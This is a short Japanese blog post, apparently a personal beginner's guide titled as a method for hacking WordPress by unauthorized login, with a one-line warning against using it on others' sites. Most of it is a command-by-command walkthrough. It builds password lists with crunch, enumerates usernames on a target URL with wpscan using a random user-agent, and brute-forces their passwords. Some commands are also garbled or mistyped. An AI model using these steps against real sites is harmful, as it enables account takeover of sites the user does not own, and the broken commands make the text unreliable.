• ホーム
• IT関連
• ハッキング
• ワードプレス　不正ログイン

WordPress　ハッキング　方法(初心者向け)

注意事項

決して他人のサイトに対して行わないでください。

今回使うツール

・AWS LightSail(仮想サーバー)
・Crunch
・Wpscan

AWS Lightsail

AWSの簡易仮想サーバー。Linuxに設定。
sshを使ってCLIを動かしていく。
３ヶ月無料で使えるので便利。

Crunch

パスワードのリストを作成する。
書式：crunch （何文字から）（何文字まで）（使う文字・記号・数値）-o （出力するファイル）
例：crunch 4 8 Aabuga1234 -0 example.txt

Wpscan

ワードプレスの不正ログインに使うハッキングツール。

いろいろダウンロードなり、アップデートなりを行う。
sudo apt-get ruby（ルビーのダウンロード）
sudo apt update && sudo apt upgrade　（インストールツールの更新）
sudo apt install curl git libcurl4-openssl-dev make zlib1g-dev gawk g++ gcc libreadline6-dev libssl-dev libyaml-dev libsqlite3-dev sqlite3 autoconf libgdbm-dev libncurses5-dev automake libtool bison pkg-config-buny ruby-dev（なんかいろいろダウンロード）
sudo gem install wpscan（Wpscanのダウンロード）
wpscan --update（Wpscanのアップデート）
cd /opt
sudo git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && sudo bundle install --without test
sudo wpscan --url http://対象URL --random-user-agent -e u

このコマンドで、ユーザー名が判明する。

パスワードを取得する。
sudo wpscan --url http://対象URL --random-user-agent -U [ユーザー名] -P [パスワードリスト]

これでパスワードが出力される。

今回困ったエラー

wpscan.rb not found
gem not found



作成者　mine koharu

---

---